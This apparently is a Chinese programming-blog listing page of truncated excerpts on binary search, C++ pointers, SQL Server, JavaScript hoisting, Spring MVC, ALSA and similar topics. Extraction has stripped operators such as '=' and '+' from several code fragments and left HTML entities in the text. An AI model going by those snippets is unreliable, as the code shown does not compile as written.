目录 1.查找单调序列中是否存在满足某条件的元素 2.寻找序列中第一个(最后一个)满足某条件的元素的位置 3.给定一个定义在[L,R]上的单调函数f(x)&#xff0c;求方程f(x)0的根 4.快速幂的递归和迭代求法 1.查找单调序列中是否存在满足某条件的元素 //二分区间为左闭右闭的[l…

编程日记2024/09/08 07:10:00

Minimum Path Sum

Given a m x n grid filled with non-negative numbers, find a path from top left to bottom right which minimizes the sum of all numbers along its path. Note: You can only move either down or right at any point in time. 格子取数问题&#xff0c;另dp[i][j]表示走…

编程日记2024/09/08 07:00:00

Thorntail 2.2.0提供从WildFly Swarm自动迁移的特性

自6月底宣布把WildFly Swarm2018.5.0改名为Thorntail2.0.0以来&#xff0c;Red Hat在8月中旬以后的三个周里发布了Thorntail 2.1.0版本和2.2.0版本。除了许多Bug修复外&#xff0c;尤其是和MicroProfile相关的&#xff0c;新特性还包括&#xff1a;\\符合MicroProfile 1.3\通过…

编程日记2024/09/08 06:50:00

Depth Bias

在dx中的depth bias要以如下形式调用 inline DWORD F2DW( float f ) { return *((DWORD*)&f); } m_pD3DDevice->SetRenderState(D3DRS_SLOPESCALEDEPTHBIAS, F2DW(1)); m_pD3DDevice->SetRenderState(D3DRS_DEPTHBIAS, F2DW(0.001)); 总之&#xff0c;奇怪的api。转载…

编程日记2024/09/08 06:40:00

(C++)用upper_bound函数取代自己写的二分查找

int a[maxn];int j upper_bound(ai1,an,(long long)a[i]*p)-a; 以上代码的作用是 在a[i1]~a[n-1]找到第一个大于a[i]*p的数&#xff0c;将其下标返回给j 注意&#xff1a; 1.函数是左闭右开的 2.末尾要减去数组的坐标a 3.不加long long强制类型转换可能丢分

编程日记2024/09/08 06:30:00

gsoap使用总结

WebService、soap、gsoap基本概念 WebService服务基本概念&#xff1a;就是一个应用程序&#xff0c;它向外界暴露出一个可以通过web进行调用的API&#xff0c;是分布式的服务组件。本质上就是要以标准的形式实现企业内外各个不同服务系统之间的互调和集成。 soap概念&#xff…

编程日记2024/09/08 06:20:00

SQL时间相关 - SQL日期,时间比较

SQL Server 中时间比较 例子: select count(*) from table where DATEDIFF ([second], 2004-09-18 00:00:18, 2004-09-18 00:00:19) > 0 说明 select DATEDIFF(day, time1 , time2) 对应示例语句如下 select DATEDIFF(day, 2010-07-23 0:41:18, 2010-07-23 23:41:18) …

编程日记2024/09/08 06:10:00

SQL Server 2008 的CDC功能

CDC(Change Data Capture)通过对事务日志的异步读取&#xff0c;记录DML操作的发生时间、类型和实际影响的数据变化&#xff0c;然后将这些数据记录到启用CDC时自动创建的表中。通过cdc相关的存储过程&#xff0c;可以获取详细的数据变化情况。由于数据变化是异步读取的&#x…

编程日记2024/09/08 06:00:00

1010 Radix

目录 总结 解题过程 总结 1. 短小精悍的一道二分算法题&#xff0c;总体思路是&#xff0c;将字符串1(如果tag不是1将两个字符串调换一下即可)转化为10进制&#xff0c;再用二分法看能否找到另一个进制使得两个字符串的10进制数相等。 2. 本题的三个函数关系是binarySearch…

编程日记2024/09/08 05:50:00

喜闻乐见的const int *p、int* const p、const int* const p

不废话直接代码示例&#xff1a; 1 void f(const int *p) {2 3 int b 10;4 5 *p 10; // error6 7 p &b; // fine8 9 } 10 11 void f(int* const p) { 12 13 int b 10; 14 15 *p 10; // fine 16 17 p &b; // error 18 19 } 20 21 v…

编程日记2024/09/08 05:40:00

Microsoft Visual Studio 2012 添加实体数据模型

Microsoft Visual Studio 2012 添加实体数据模型 1、创建一个web项目 2、添加ADO实体数据模型&#xff0c;如下图&#xff1a; 3、选择 从数据库生成&#xff0c;然后下一步 4、新建连接&#xff0c;如下图&#xff1a; 5、填写服务器名等&#xff0c;如下图&#xff1a; 6、选…

编程日记2024/09/08 05:30:00

5.1软件升级的小阳春

现在正在去白山的车上&#xff0c;刚睡醒。习惯性的拿出手机上网&#xff0c;UCWEB提醒有最新版本升级&#xff0c;使用尚邮接收邮件的时候同样提醒有信版本升级。 公司产品9.0也正式完成&#xff0c;昨天整个小组的同事开始在领地咖啡馆&#xff0c;进行新需求的确认。 4月末5…

编程日记2024/09/08 05:20:00

1030 完美数列(二分解法)

1. 将整型序列从小到大排序后&#xff0c;这道题的本质是&#xff0c;对于每一个元素i&#xff0c;找出最后一个满足p*A[i]>A[j]的元素j&#xff0c;可以转化为找出第一个不满足p*A[i]>A[j]也即p*A[i]<A[j]的元素j。再用j-1。 2.LL product (LL)p*A[i];这里后面两个…

编程日记2024/09/08 05:10:00

javascript变量声明 及作用域

javascript变量声明提升(hoisting) http://openwares.net/js/javascript_declaration_hoisting.html 可能要FQ一下 javascript的变量声明具有hoisting机制&#xff0c;JavaScript引擎在执行的时候&#xff0c;会把所有变量的声明都提升到当前作用域的最前面。 先看一段代码 123…

编程日记2024/09/08 05:00:00

【转载】全面理解javascript的caller,callee,call,apply概念(修改版)

今天写PPlayer&#xff0c;发现有段代码引起了我的兴趣&#xff1a; var Class { create: function() { return function() { this.initialize.apply(this, arguments); } } } 这是高手写的&#xff0c;实现了创建一个类&#xff08;其实就是对象&#xff0c;函数对象&#xf…

编程日记2024/09/08 04:50:00

springMVC自定义全局异常

SpringMVC通过HandlerExceptionResolver处理程序异常&#xff0c;包括Handler映射&#xff0c;数据绑定以及目标方法执行时所发生的异常。 SpringMVC中默认是没有加装载HandlerExceptionResolver&#xff0c;我们需要在SpringMVC.xml中配置 <mvc:annotation-driven /> 1、…

编程日记2024/09/08 04:40:00

1030 完美数列(two pointers解法)

1. 这道题出现在二分法&#xff0c;但是特殊之处在于&#xff0c;双指针是嵌套的&#xff0c;程序看上去有些像暴力枚举&#xff0c;但其实是利用了&#xff0c;如果i<j&#xff0c;a[i]*p>a[j]&#xff0c;那么一定有k在[i,j]范围内&#xff0c;a[i]*p>a[k]&#xff…

编程日记2024/09/08 04:30:00

alsa声卡切换

环境 ubuntu12.04 因为桌面版的默认装了&#xff0c;而且调声音也很方便&#xff0c;这里说一下server版下的配置&#xff0c;毕竟做开发经常还是用server版的 1.安装 apt-get install alsa-base 它会把alsa-utils也一块装了&#xff0c;这是个工具包&#xff0c;如果没装的话 …

编程日记2024/09/08 04:20:00

asp.net获取网站路径

网站在服务器磁盘上的物理路径: HttpRuntime.AppDomainAppPath 虚拟程序路径: HttpRuntime.AppDomainAppVirtualPath 任何于Request/HttpContext.Current等相关的方法, 都只能在有请求上下文或者页面时使用. 即在无请求上下文时,HttpContext.Current为null. 而上面提到的方法一…

编程日记2024/09/08 04:10:00

iOS 绘制圆角

级别&#xff1a; ★☆☆☆☆ 标签&#xff1a;「iOS切圆角」「layer圆角」「CAShapeLayer圆角」 作者&#xff1a; XsH 审校&#xff1a; QiShare团队 项目中会常有圆角&#xff08;或圆形&#xff09;显示视图的需求&#xff08;比如用户头像的显示&#xff09;&#xff0c;也…

编程日记2024/09/08 04:00:00

(C++)归并排序的递归与非递归实现

递归实现 merge函数利用的是双指针技巧降低复杂度。 mergeSort函数使用了递归&#xff0c;当中先对左右序列各调用一次mergeSort&#xff0c;再对整个序列调用merge。就按照最浅层的归并的思想去理解&#xff0c;不要大脑走到哪就step in。 另外mergeSort进入递归有个left&l…

编程日记2024/09/08 03:50:00